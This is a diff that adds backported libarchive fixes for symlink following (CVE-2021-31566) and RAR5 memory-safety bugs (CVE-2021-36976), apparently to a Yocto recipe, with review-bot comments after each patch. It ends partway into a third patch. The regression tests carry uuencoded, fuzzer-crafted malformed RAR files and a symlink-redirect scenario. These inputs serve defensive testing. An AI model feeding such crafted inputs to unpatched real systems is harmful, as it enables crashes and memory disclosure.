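+@@ -467,7 +467,6 @@
+if (entries == 0)
+return (ARCHIVE_OK);
+
+-
+switch (ae_requested_type) {
+case ARCHIVE_ENTRY_ACL_TYPE_POSIX1E:
+cmd = SETACL;
+@@ -492,6 +491,12 @@
+return (ARCHIVE_FAILED);
+}
+
++ if (S_ISLNK(mode)) {
++ /* Skip ACLs on symbolic links */
++ ret = ARCHIVE_OK;
++ goto exit_free;
++ }
++
+e = 0;
+
+while (archive_acl_next(a, abstract_acl, ae_requested_type, &ae_type,
+@@ -801,7 +806,7 @@
+if ((archive_acl_types(abstract_acl)
+& ARCHIVE_ENTRY_ACL_TYPE_POSIX1E) != 0) {
+/* Solaris writes POSIX.1e access and default ACLs together */
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ARCHIVE_ENTRY_ACL_TYPE_POSIX1E, "posix1e");
+
+/* Simultaneous POSIX.1e and NFSv4 is not supported */
+@@ -810,7 +815,7 @@
+#if ARCHIVE_ACL_SUNOS_NFS4
+else if ((archive_acl_types(abstract_acl) &
+ARCHIVE_ENTRY_ACL_TYPE_NFS4) != 0) {
+- ret = set_acl(a, fd, name, abstract_acl,
++ ret = set_acl(a, fd, name, abstract_acl, mode,
+ARCHIVE_ENTRY_ACL_TYPE_NFS4, "nfs4");
+}
+#endif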
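Review bot: The new `mode` parameter on `set_acl()` is undocumented in all three back ends (FreeBSD, Linux libacl, SunOS), and the guards that use it report their outcome differently. A symbolic link is skipped with ARCHIVE_OK and no message, while a default ACL on a non-directory sets an error and returns ARCHIVE_WARN. A comment above each definition, for example `/* mode: file type bits of the entry being restored; ACLs are not applied to symbolic links */`, would tell callers that ARCHIVE_OK can mean "skipped". In archive_disk_acl_linux.c the hunk at -343 also reads `mode` in the RichACL path, but this patch shows no signature change for that function; presumably it already receives `mode`, though that path looks conditionally compiled, so a build with RichACL support enabled is worth running. The function bodies start and end outside the hunks.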
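--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-01.patch
@@ -0,0 +1,23 @@
+Description: Never follow symlinks when setting file flags on Linux
+Published as CVE-2021-31566
+Origin: upstream, https://github.com/libarchive/libarchive/commit/e2ad1a2c3064fa9eba6274b3641c4c1beed25c0b
+Bug-Debian: https://bugs.debian.org/1001990
+Author: Martin Matuska <martin@matuska.org>
+Last-Update: 2021-12-20
+
+CVE: CVE-2021-31566
+Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/libarchive/archive_write_disk_posix.c
++++ b/libarchive/archive_write_disk_posix.c
+@@ -3927,7 +3927,8 @@
+
+/* If we weren't given an fd, open it ourselves. */
+if (myfd < 0) {
+- myfd = open(name, O_RDONLY | O_NONBLOCK | O_BINARY | O_CLOEXEC);
++ myfd = open(name, O_RDONLY | O_NONBLOCK | O_BINARY |
++ O_CLOEXEC | O_NOFOLLOW);
+__archive_ensure_cloexec_flag(myfd);
+}
+if (myfd < 0)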
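Review bot: `O_NOFOLLOW` guards only the final component of `name`, so a symbolic link in any parent directory is still followed by this `open()`. The hunk does not show whether the path prefix was checked earlier, so the comment above the call should state the assumption, for example `/* O_NOFOLLOW covers the last component only; parent directories are expected to have been checked already */`. With the flag set, `open()` on a symlink now fails and control reaches the `if (myfd < 0)` branch, whose body is outside the hunk. Confirm that this branch returns without falling back to a path-based call that follows links.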
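--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-31566-02.patch
@@ -0,0 +1,172 @@
+Description: Do not follow symlinks when processing the fixup list
+Published as CVE-2021-31566
+Origin: upstream, https://github.com/libarchive/libarchive/commit/b41daecb5ccb4c8e3b2c53fd6147109fc12c3043
+Bug-Debian: https://bugs.debian.org/1001990
+Author: Martin Matuska <martin@matuska.org>
+Last-Update: 2021-12-20
+
+CVE: CVE-2021-31566
+Upstream-Status: Backport [http://deb.debian.org/debian/pool/main/liba/libarchive/libarchive_3.4.3-2+deb11u1.debian.tar.xz]
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -556,6 +556,7 @@
+libarchive/test/test_write_disk.c \
+libarchive/test/test_write_disk_appledouble.c \
+libarchive/test/test_write_disk_failures.c \
++ libarchive/test/test_write_disk_fixup.c \
+libarchive/test/test_write_disk_hardlink.c \
+libarchive/test/test_write_disk_hfs_compression.c \
+libarchive/test/test_write_disk_lookup.c \
+--- a/libarchive/archive_write_disk_posix.c
++++ b/libarchive/archive_write_disk_posix.c
+@@ -2461,6 +2461,7 @@
+{
+struct archive_write_disk *a = (struct archive_write_disk *)_a;
+struct fixup_entry *next, *p;
++ struct stat st;
+int fd, ret;
+
+archive_check_magic(&a->archive, ARCHIVE_WRITE_DISK_MAGIC,
+@@ -2478,6 +2479,20 @@
+(TODO_TIMES | TODO_MODE_BASE | TODO_ACLS | TODO_FFLAGS)) {
+fd = open(p->name,
+O_WRONLY | O_BINARY | O_NOFOLLOW | O_CLOEXEC);
++ if (fd == -1) {
++ /* If we cannot lstat, skip entry */
++ if (lstat(p->name, &st) != 0)
++ goto skip_fixup_entry;
++ /*
++ * If we deal with a symbolic link, mark
++ * it in the fixup mode to ensure no
++ * modifications are made to its target.
++ */
++ if (S_ISLNK(st.st_mode)) {
++ p->mode &= ~S_IFMT;
++ p->mode |= S_IFLNK;
++ }
++ }
+}
+if (p->fixup & TODO_TIMES) {
+set_times(a, fd, p->mode, p->name,
+@@ -2492,7 +2507,12 @@
+fchmod(fd, p->mode);
+else
+#endif
+- chmod(p->name, p->mode);
++#ifdef HAVE_LCHMOD
++ lchmod(p->name, p->mode);
++#else
++ if (!S_ISLNK(p->mode))
++ chmod(p->name, p->mode);
++#endif
+}
+if (p->fixup & TODO_ACLS)
+archive_write_disk_set_acls(&a->archive, fd,
+@@ -2503,6 +2523,7 @@
+if (p->fixup & TODO_MAC_METADATA)
+set_mac_metadata(a, p->name, p->mac_metadata,
+p->mac_metadata_size);
++skip_fixup_entry:
+next = p->next;
+archive_acl_clear(&p->acl);
+free(p->mac_metadata);
+@@ -2643,6 +2664,7 @@
+fe->next = a->fixup_list;
+a->fixup_list = fe;
+fe->fixup = 0;
++ fe->mode = 0;
+fe->name = strdup(pathname);
+return (fe);
+}
+--- a/libarchive/test/CMakeLists.txt
++++ b/libarchive/test/CMakeLists.txt
+@@ -208,6 +208,7 @@
+test_write_disk.c
+test_write_disk_appledouble.c
+test_write_disk_failures.c
++ test_write_disk_fixup.c
+test_write_disk_hardlink.c
+test_write_disk_hfs_compression.c
+test_write_disk_lookup.c
+--- /dev/null
++++ b/libarchive/test/test_write_disk_fixup.c
+@@ -0,0 +1,77 @@
++/*-
++ * Copyright (c) 2021 Martin Matuska
++ * All rights reserved.
++ *
++ * Redistribution and use in source and binary forms, with or without
++ * modification, are permitted provided that the following conditions
++ * are met:
++ * 1. Redistributions of source code must retain the above copyright
++ * notice, this list of conditions and the following disclaimer.
++ * 2. Redistributions in binary form must reproduce the above copyright
++ * notice, this list of conditions and the following disclaimer in the
++ * documentation and/or other materials provided with the distribution.
++ *
++ * THIS SOFTWARE IS PROVIDED BY THE AUTHOR(S) ``AS IS'' AND ANY EXPRESS OR
++ * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
++ * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
++ * IN NO EVENT SHALL THE AUTHOR(S) BE LIABLE FOR ANY DIRECT, INDIRECT,
++ * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
++ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
++ * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
++ * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
++ * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
++ * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
++ */
++#include "test.h"
++
++/*
++ * Test fixup entries don't follow symlinks
++ */
++DEFINE_TEST(test_write_disk_fixup)
++{
++ struct archive *ad;
++ struct archive_entry *ae;
++ int r;
++
++ if (!canSymlink()) {
++ skipping("Symlinks not supported");
++ return;
++ }
++
++ /* Write entries to disk. */
++ assert((ad = archive_write_disk_new()) != NULL);
++
++ /*
++ * Create a file
++ */
++ assertMakeFile("victim", 0600, "a");
++
++ /*
++ * Create a directory and a symlink with the same name
++ */
++
++ /* Directory: dir */
++ assert((ae = archive_entry_new()) != NULL);
++ archive_entry_copy_pathname(ae, "dir");
++ archive_entry_set_mode(ae, AE_IFDIR | 0606);
++ assertEqualIntA(ad, 0, archive_write_header(ad, ae));
++ assertEqualIntA(ad, 0, archive_write_finish_entry(ad));
++ archive_entry_free(ae);
++
++ /* Symbolic Link: dir -> foo */
++ assert((ae = archive_entry_new()) != NULL);
++ archive_entry_copy_pathname(ae, "dir");
++ archive_entry_set_mode(ae, AE_IFLNK | 0777);
++ archive_entry_set_size(ae, 0);
++ archive_entry_copy_symlink(ae, "victim");
++ assertEqualIntA(ad, 0, r = archive_write_header(ad, ae));
++ if (r >= ARCHIVE_WARN)
++ assertEqualIntA(ad, 0, archive_write_finish_entry(ad));
++ archive_entry_free(ae);
++
++ assertEqualInt(ARCHIVE_OK, archive_write_free(ad));
++
++ /* Test the entries on disk. */
++ assertIsSymlink("dir", "victim", 0);
++ assertFileMode("victim", 0600);
++}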
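Review bot: In the fixup loop the new `lstat(p->name, &st)` and the later path-based calls (`lchmod`/`chmod`, and whatever `set_times` does with `p->name` when `fd` is -1) are separate lookups, so the entry can still be replaced by a symlink between the check and the use; the `#else` branch `if (!S_ISLNK(p->mode)) chmod(p->name, p->mode);` follows links by design. The patch narrows that window rather than closing it, and a comment should say so, e.g. `/* lstat() result can be stale by the time chmod() runs; no fd is held for this entry. */`. The return values of `lchmod` and `chmod` are also discarded, so a libc whose `lchmod` exists but is unsupported would silently skip the mode fixup, which is worth confirming for the targets this recipe builds for. In the new test the comment `/* Symbolic Link: dir -> foo */` should read `dir -> victim` to match `archive_entry_copy_symlink(ae, "victim")`. The patched function's body extends beyond the hunks shown.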
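--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-1.patch
@@ -0,0 +1,321 @@
+From 05ebb55896d10a9737dad9ae0303f7f45489ba6f Mon Sep 17 00:00:00 2001
+From: Grzegorz Antoniak <ga@anadoxin.org>
+Date: Sat, 13 Feb 2021 09:08:13 +0100
+Subject: [PATCH] RAR5 reader: fixed out of bounds read in some files
+
+Added more range checks in the bit stream reading functions
+(read_bits_16 and read_bits_32) in order to better guard against out of
+memory reads.
+
+This commit contains a test with OSSFuzz sample #30448.
+
+Upstream-Status: Backport [https://git.launchpad.net/ubuntu/+source/libarchive/plain/debian/patches/CVE-2021-36976-1.patch?h=applied/3.4.3-2ubuntu0.1]
+CVE: CVE-2021-36976
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+---
+Makefile.am | 1 +
+libarchive/archive_read_support_format_rar5.c | 108 ++++++++++--------
+libarchive/test/test_read_format_rar5.c | 16 +++
+...r5_decode_number_out_of_bounds_read.rar.uu | 10 ++
+4 files changed, 89 insertions(+), 46 deletions(-)
+create mode 100644 libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu
+
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -883,6 +883,7 @@ libarchive_test_EXTRA_DIST=\
+libarchive/test/test_read_format_rar5_arm_filter_on_window_boundary.rar.uu \
+libarchive/test/test_read_format_rar5_different_winsize_on_merge.rar.uu \
+libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
++ libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
+libarchive/test/test_read_format_raw.bufr.uu \
+libarchive/test/test_read_format_raw.data.gz.uu \
+libarchive/test/test_read_format_raw.data.Z.uu \
+--- a/libarchive/archive_read_support_format_rar5.c
++++ b/libarchive/archive_read_support_format_rar5.c
+@@ -1012,7 +1012,16 @@ static int read_var_sized(struct archive
+return ret;
+}
+
+-static int read_bits_32(struct rar5* rar, const uint8_t* p, uint32_t* value) {
++static int read_bits_32(struct archive_read* a, struct rar5* rar,
++ const uint8_t* p, uint32_t* value)
++{
++ if(rar->bits.in_addr >= rar->cstate.cur_block_size) {
++ archive_set_error(&a->archive,
++ ARCHIVE_ERRNO_PROGRAMMER,
++ "Premature end of stream during extraction of data (#1)");
++ return ARCHIVE_FATAL;
++ }
++
+uint32_t bits = ((uint32_t) p[rar->bits.in_addr]) << 24;
+bits |= p[rar->bits.in_addr + 1] << 16;
+bits |= p[rar->bits.in_addr + 2] << 8;
+@@ -1023,7 +1032,16 @@ static int read_bits_32(struct rar5* rar
+return ARCHIVE_OK;
+}
+
+-static int read_bits_16(struct rar5* rar, const uint8_t* p, uint16_t* value) {
++static int read_bits_16(struct archive_read* a, struct rar5* rar,
++ const uint8_t* p, uint16_t* value)
++{
++ if(rar->bits.in_addr >= rar->cstate.cur_block_size) {
++ archive_set_error(&a->archive,
++ ARCHIVE_ERRNO_PROGRAMMER,
++ "Premature end of stream during extraction of data (#2)");
++ return ARCHIVE_FATAL;
++ }
++
+int bits = (int) ((uint32_t) p[rar->bits.in_addr]) << 16;
+bits |= (int) p[rar->bits.in_addr + 1] << 8;
+bits |= (int) p[rar->bits.in_addr + 2];
+@@ -1039,8 +1057,8 @@ static void skip_bits(struct rar5* rar,
+}
+
+/* n = up to 16 */
+-static int read_consume_bits(struct rar5* rar, const uint8_t* p, int n,
+- int* value)
++static int read_consume_bits(struct archive_read* a, struct rar5* rar,
++ const uint8_t* p, int n, int* value)
+{
+uint16_t v;
+int ret, num;
+@@ -1051,7 +1069,7 @@ static int read_consume_bits(struct rar5
+return ARCHIVE_FATAL;
+}
+
+- ret = read_bits_16(rar, p, &v);
++ ret = read_bits_16(a, rar, p, &v);
+if(ret != ARCHIVE_OK)
+return ret;
+
+@@ -2425,13 +2443,13 @@ static int create_decode_tables(uint8_t*
+static int decode_number(struct archive_read* a, struct decode_table* table,
+const uint8_t* p, uint16_t* num)
+{
+- int i, bits, dist;
++ int i, bits, dist, ret;
+uint16_t bitfield;
+uint32_t pos;
+struct rar5* rar = get_context(a);
+
+- if(ARCHIVE_OK != read_bits_16(rar, p, &bitfield)) {
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &bitfield))) {
++ return ret;
+}
+
+bitfield &= 0xfffe;
+@@ -2537,14 +2555,6 @@ static int parse_tables(struct archive_r
+for(i = 0; i < HUFF_TABLE_SIZE;) {
+uint16_t num;
+
+- if((rar->bits.in_addr + 6) >= rar->cstate.cur_block_size) {
+- /* Truncated data, can't continue. */
+- archive_set_error(&a->archive,
+- ARCHIVE_ERRNO_FILE_FORMAT,
+- "Truncated data in huffman tables (#2)");
+- return ARCHIVE_FATAL;
+- }
+-
+ret = decode_number(a, &rar->cstate.bd, p, &num);
+if(ret != ARCHIVE_OK) {
+archive_set_error(&a->archive,
+@@ -2561,8 +2571,8 @@ static int parse_tables(struct archive_r
+/* 16..17: repeat previous code */
+uint16_t n;
+
+- if(ARCHIVE_OK != read_bits_16(rar, p, &n))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &n)))
++ return ret;
+
+if(num == 16) {
+n >>= 13;
+@@ -2590,8 +2600,8 @@ static int parse_tables(struct archive_r
+/* other codes: fill with zeroes `n` times */
+uint16_t n;
+
+- if(ARCHIVE_OK != read_bits_16(rar, p, &n))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &n)))
++ return ret;
+
+if(num == 18) {
+n >>= 13;
+@@ -2707,22 +2717,22 @@ static int parse_block_header(struct arc
+}
+
+/* Convenience function used during filter processing. */
+-static int parse_filter_data(struct rar5* rar, const uint8_t* p,
+- uint32_t* filter_data)
++static int parse_filter_data(struct archive_read* a, struct rar5* rar,
++ const uint8_t* p, uint32_t* filter_data)
+{
+- int i, bytes;
++ int i, bytes, ret;
+uint32_t data = 0;
+
+- if(ARCHIVE_OK != read_consume_bits(rar, p, 2, &bytes))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_consume_bits(a, rar, p, 2, &bytes)))
++ return ret;
+
+bytes++;
+
+for(i = 0; i < bytes; i++) {
+uint16_t byte;
+
+- if(ARCHIVE_OK != read_bits_16(rar, p, &byte)) {
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_bits_16(a, rar, p, &byte))) {
++ return ret;
+}
+
+/* Cast to uint32_t will ensure the shift operation will not
+@@ -2765,16 +2775,17 @@ static int parse_filter(struct archive_r
+uint16_t filter_type;
+struct filter_info* filt = NULL;
+struct rar5* rar = get_context(ar);
++ int ret;
+
+/* Read the parameters from the input stream. */
+- if(ARCHIVE_OK != parse_filter_data(rar, p, &block_start))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = parse_filter_data(ar, rar, p, &block_start)))
++ return ret;
+
+- if(ARCHIVE_OK != parse_filter_data(rar, p, &block_length))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = parse_filter_data(ar, rar, p, &block_length)))
++ return ret;
+
+- if(ARCHIVE_OK != read_bits_16(rar, p, &filter_type))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_bits_16(ar, rar, p, &filter_type)))
++ return ret;
+
+filter_type >>= 13;
+skip_bits(rar, 3);
+@@ -2814,8 +2825,8 @@ static int parse_filter(struct archive_r
+if(filter_type == FILTER_DELTA) {
+int channels;
+
+- if(ARCHIVE_OK != read_consume_bits(rar, p, 5, &channels))
+- return ARCHIVE_EOF;
++ if(ARCHIVE_OK != (ret = read_consume_bits(ar, rar, p, 5, &channels)))
++ return ret;
+
+filt->channels = channels + 1;
+}
+@@ -2823,10 +2834,11 @@ static int parse_filter(struct archive_r
+return ARCHIVE_OK;
+}
+
+-static int decode_code_length(struct rar5* rar, const uint8_t* p,
+- uint16_t code)
++static int decode_code_length(struct archive_read* a, struct rar5* rar,
++ const uint8_t* p, uint16_t code)
+{
+int lbits, length = 2;
++
+if(code < 8) {
+lbits = 0;
+length += code;
+@@ -2838,7 +2850,7 @@ static int decode_code_length(struct rar
+if(lbits > 0) {
+int add;
+
+- if(ARCHIVE_OK != read_consume_bits(rar, p, lbits, &add))
++ if(ARCHIVE_OK != read_consume_bits(a, rar, p, lbits, &add))
+return -1;
+
+length += add;
+@@ -2933,7 +2945,7 @@ static int do_uncompress_block(struct ar
+continue;
+} else if(num >= 262) {
+uint16_t dist_slot;
+- int len = decode_code_length(rar, p, num - 262),
++ int len = decode_code_length(a, rar, p, num - 262),
+dbits,
+dist = 1;
+
+@@ -2975,12 +2987,12 @@ static int do_uncompress_block(struct ar
+uint16_t low_dist;
+
+if(dbits > 4) {
+- if(ARCHIVE_OK != read_bits_32(
+- rar, p, &add)) {
++ if(ARCHIVE_OK != (ret = read_bits_32(
++ a, rar, p, &add))) {
+/* Return EOF if we
+* can't read more
+* data. */
+- return ARCHIVE_EOF;
++ return ret;
+}
+
+skip_bits(rar, dbits - 4);
+@@ -3015,11 +3027,11 @@ static int do_uncompress_block(struct ar
+/* dbits is one of [0,1,2,3] */
+int add;
+
+- if(ARCHIVE_OK != read_consume_bits(rar,
+- p, dbits, &add)) {
++ if(ARCHIVE_OK != (ret = read_consume_bits(a, rar,
++ p, dbits, &add))) {
+/* Return EOF if we can't read
+* more data. */
+- return ARCHIVE_EOF;
++ return ret;
+}
+
+dist += add;
+@@ -3076,7 +3088,11 @@ static int do_uncompress_block(struct ar
+return ARCHIVE_FATAL;
+}
+
+- len = decode_code_length(rar, p, len_slot);
++ len = decode_code_length(a, rar, p, len_slot);
++ if (len == -1) {
++ return ARCHIVE_FATAL;
++ }
++
+rar->cstate.last_len = len;
+
+if(ARCHIVE_OK != copy_string(a, len, dist))
+--- a/libarchive/test/test_read_format_rar5.c
++++ b/libarchive/test/test_read_format_rar5.c
+@@ -1271,3 +1271,20 @@ DEFINE_TEST(test_read_format_rar5_block_
+
+EPILOGUE();
+}
++
++DEFINE_TEST(test_read_format_rar5_decode_number_out_of_bounds_read)
++{
++ /* oss fuzz 30448 */
++
++ char buf[4096];
++ PROLOGUE("test_read_format_rar5_decode_number_out_of_bounds_read.rar");
++
++ /* Return codes of those calls are ignored, because this sample file
++ * is invalid. However, the unpacker shouldn't produce any SIGSEGV
++ * errors during processing. */
++
++ (void) archive_read_next_header(a, &ae);
++ while(0 < archive_read_data(a, buf, sizeof(buf))) {}
++
++ EPILOGUE();
++}
+--- /dev/null
++++ b/libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu
+@@ -0,0 +1,10 @@
++begin 644 test_read_format_rar5_decode_number_out_of_bounds_read.rar
++M4F%R(1H'`0!3@"KT`P+G(@(0("`@@`L!!"`@("`@(($D_[BJ2"!::7!)210V
++M+0#ZF#)Q!`+>YPW_("`@("``_R````````````````````````````!__P``
++M``````!T72`@/EW_(/\@("`@("`@("`@("`@("`@("`@("`@("`@(/\@("`@
++M("`@("#_("`@("`@("`@("`@("`@("`@("`@("`@("#_("`@("`@("`@_R`@
++M("`@("`@("`@("`@("`@("`@("`@("`@_R`@("`@("`@(/\@("`@("`@("`@
++M("`@("`@("`@("`@("`@(/\@("`@("`@("#_("`@("`@("`@("`@("`@("`@
++E("`@("`@("#_("`@("`@("`@_R`@("`@("`@("`@("`@("`@(```
++`
++end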
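Review bot: The guard added to `read_bits_32` and `read_bits_16` tests only `rar->bits.in_addr >= rar->cstate.cur_block_size`, while the lines right after it index `p[rar->bits.in_addr + 1]` and `p[rar->bits.in_addr + 2]` (and further in `read_bits_32`, whose body continues outside the hunk), so the last bytes of a block can still be read past `cur_block_size`. The same commit removes the `(rar->bits.in_addr + 6) >= rar->cstate.cur_block_size` test from `parse_tables`, which did leave headroom. Unless the buffer behind `p` is guaranteed to carry slack beyond the block size (not visible here), the comparison should cover the widest access, e.g. `if(rar->bits.in_addr + 2 >= rar->cstate.cur_block_size) {` in `read_bits_16`; if valid streams depend on the tail read, a comment stating the slack guarantee is needed instead. Malformed input is reported with `ARCHIVE_ERRNO_PROGRAMMER` where the removed check used `ARCHIVE_ERRNO_FILE_FORMAT`, and the two `Return EOF if we can't read more data` comments in `do_uncompress_block` are stale now that `ret` is returned.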
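--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-2.patch
@@ -0,0 +1,121 @@
+From 17f4e83c0f0fc3bacf4b2bbacb01f987bb5aff5f Mon Sep 17 00:00:00 2001
+From: Grzegorz Antoniak <ga@anadoxin.org>
+Date: Fri, 12 Feb 2021 20:18:31 +0100
+Subject: [PATCH] RAR5 reader: fix invalid memory access in some files
+
+RAR5 reader uses several variables to manage the window buffer during
+extraction: the buffer itself (`window_buf`), the current size of the
+window buffer (`window_size`), and a helper variable (`window_mask`)
+that is used to constrain read and write offsets to the window buffer.
+
+Some specially crafted files can force the unpacker to update the
+`window_mask` variable to a value that is out of sync with current
+buffer size. If the `window_mask` will be bigger than the actual buffer
+size, then an invalid access operation can happen (SIGSEGV).
+
+This commit ensures that if the `window_size` and `window_mask` will be
+changed, the window buffer will be reallocated to the proper size, so no
+invalid memory operation should be possible.
+
+This commit contains a test file from OSSFuzz #30442.
+
+Upstream-Status: Backport [https://git.launchpad.net/ubuntu/+source/libarchive/plain/debian/patches/CVE-2021-36976-2.patch?h=applied/3.4.3-2ubuntu0.1]
+CVE: CVE-2021-36976
+Signed-off-by: Virendra Thakur <virendra.thakur@kpit.com>
+
+---
+Makefile.am | 1 +
+libarchive/archive_read_support_format_rar5.c | 27 ++++++++++++++-----
+libarchive/test/test_read_format_rar5.c | 17 ++++++++++++
+...mat_rar5_window_buf_and_size_desync.rar.uu | 11 ++++++++
+4 files changed, 50 insertions(+), 6 deletions(-)
+create mode 100644 libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu
+
+--- a/Makefile.am
++++ b/Makefile.am
+@@ -884,6 +884,7 @@ libarchive_test_EXTRA_DIST=\
+libarchive/test/test_read_format_rar5_different_winsize_on_merge.rar.uu \
+libarchive/test/test_read_format_rar5_block_size_is_too_small.rar.uu \
+libarchive/test/test_read_format_rar5_decode_number_out_of_bounds_read.rar.uu \
++ libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu \
+libarchive/test/test_read_format_raw.bufr.uu \
+libarchive/test/test_read_format_raw.data.gz.uu \
+libarchive/test/test_read_format_raw.data.Z.uu \
+--- a/libarchive/archive_read_support_format_rar5.c
++++ b/libarchive/archive_read_support_format_rar5.c
+@@ -1730,14 +1730,29 @@ static int process_head_file(struct arch
+}
+}
+
+- /* If we're currently switching volumes, ignore the new definition of
+- * window_size. */
+- if(rar->cstate.switch_multivolume == 0) {
+- /* Values up to 64M should fit into ssize_t on every
+- * architecture. */
+- rar->cstate.window_size = (ssize_t) window_size;
++ if(rar->cstate.window_size < (ssize_t) window_size &&
++ rar->cstate.window_buf)
++ {
++ /* If window_buf has been allocated before, reallocate it, so
++ * that its size will match new window_size. */
++
++ uint8_t* new_window_buf =
++ realloc(rar->cstate.window_buf, window_size);
++
++ if(!new_window_buf) {
++ archive_set_error(&a->archive, ARCHIVE_ERRNO_PROGRAMMER,
++ "Not enough memory when trying to realloc the window "
++ "buffer.");
++ return ARCHIVE_FATAL;
++ }
++
++ rar->cstate.window_buf = new_window_buf;
+}
+
++ /* Values up to 64M should fit into ssize_t on every
++ * architecture. */
++ rar->cstate.window_size = (ssize_t) window_size;
++
+if(rar->file.solid > 0 && rar->file.solid_window_size == 0) {
+/* Solid files have to have the same window_size across
+whole archive. Remember the window_size parameter
+--- a/libarchive/test/test_read_format_rar5.c
++++ b/libarchive/test/test_read_format_rar5.c
+@@ -1206,6 +1206,23 @@ DEFINE_TEST(test_read_format_rar5_differ
+EPILOGUE();
+}
+
++DEFINE_TEST(test_read_format_rar5_window_buf_and_size_desync)
++{
++ /* oss fuzz 30442 */
++
++ char buf[4096];
++ PROLOGUE("test_read_format_rar5_window_buf_and_size_desync.rar");
++
++ /* Return codes of those calls are ignored, because this sample file
++ * is invalid. However, the unpacker shouldn't produce any SIGSEGV
++ * errors during processing. */
++
++ (void) archive_read_next_header(a, &ae);
++ while(0 < archive_read_data(a, buf, 46)) {}
++
++ EPILOGUE();
++}
++
+DEFINE_TEST(test_read_format_rar5_arm_filter_on_window_boundary)
+{
+char buf[4096];
+--- /dev/null
++++ b/libarchive/test/test_read_format_rar5_window_buf_and_size_desync.rar.uu
+@@ -0,0 +1,11 @@
++begin 644 test_read_format_rar5_window_buf_and_size_desync.rar
++M4F%R(1H'`0`]/-[E`@$`_P$`1#[Z5P("`PL``BXB"?\`!(@B@0`)6.-AF?_1
++M^0DI&0GG(F%R(0<:)`!3@"KT`P+G(@O_X[\``#&``(?!!0$$[:L``$.M*E)A
++M<B$`O<\>P0";/P1%``A*2DI*2DYQ<6TN9'%*2DI*2DI*``!D<F--``````"Z
++MNC*ZNKJZNFYO=&%I;+JZNKJZNKJZOKJZ.KJZNKJZNKKZU@4%````0$!`0$!`
++M0$!`0$!`0$!`0$#_________/T#`0$!`0$!`-UM`0$!`0$!`0$!`0$!`0$!`
++M0$!`0'!,J+:O!IZ-WN4'@`!3*F0`````````````````````````````````
++M``````````````#T`P)287(A&@<!`%.`*O0#`N<B`_,F@`'[__\``(`4`01S
++J'`/H/O\H@?\D`#O9GIZ>GN<B"_]%``(``&1RGIZ>GIZ>8_^>GE/_``!.
++`
++end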
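Review bot: When `realloc(rar->cstate.window_buf, window_size)` grows the buffer in `process_head_file`, the bytes between the old and the new `window_size` are left uninitialised, so a later back-reference into that region would copy stale heap contents into the extracted output. If the original allocation zero-fills (not visible in this hunk), the grown tail should match, e.g. `memset(new_window_buf + rar->cstate.window_size, 0, window_size - rar->cstate.window_size);` before the pointer is stored. The hunk also drops the `switch_multivolume == 0` condition, so `window_size` is now overwritten on every file header; `window_mask` is not touched in the visible lines and should be confirmed to be recomputed wherever it is derived. The allocation failure is reported with `ARCHIVE_ERRNO_PROGRAMMER`, where `ENOMEM` would describe it better. `process_head_file` continues outside the hunk.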
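--- /dev/null
+++ b/meta/recipes-extended/libarchive/libarchive/CVE-2021-36976-3.patch
@@ -0,0 +1,93 @@
+From 313bcd7ac547f7cc25945831f63507420c0874d7 Mon Sep 17 00:00:00 2001
+From: Grzegorz Antoniak <ga@anadoxin.org>
+Date: Sat, 13 Feb 2021 10:13:22 +0100
+Subject: [PATCH] RAR5 reader: add more checks for invalid extraction
+parameters
+
+Some specially crafted files declare invalid extraction parameters that
+can confuse the RAR5 reader.
+
+One of the arguments is the declared window size parameter that the
+archive file can declare for each file stored in the archive. Some
+crafted files declare window size equal to 0, which is clearly wrong.
+
+This commit adds additional safety checks decreasing the tolerance of
+the RAR5 format.
+
+This commit also contains OSSFuzz sample #30459.
+---
+Makefile.am | 1 +
+libarchive/archive_read_support_format_rar5.c | 10 ++++++++++
+libarchive/test/test_read_format_rar5.c | 19 +++++++++++++++++++
+...t_rar5_bad_window_sz_in_mltarc_file.rar.uu | 7 +++++++
+4 files changed, 37 insertions(+)
+create mode 100644 libarchive/test/test_read_format_rar5_bad_window_sz_in_mltarc_file.rar.uu
+
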